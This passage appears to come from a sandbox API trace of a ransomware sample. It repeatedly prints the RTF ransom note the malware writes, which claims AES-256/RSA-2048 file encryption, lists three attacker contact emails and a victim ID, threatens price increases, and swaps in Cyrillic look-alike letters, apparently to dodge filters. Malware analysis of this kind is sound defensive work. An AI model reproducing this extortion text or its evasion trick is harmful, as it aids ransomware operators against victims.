pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.268] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1ea3958, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response 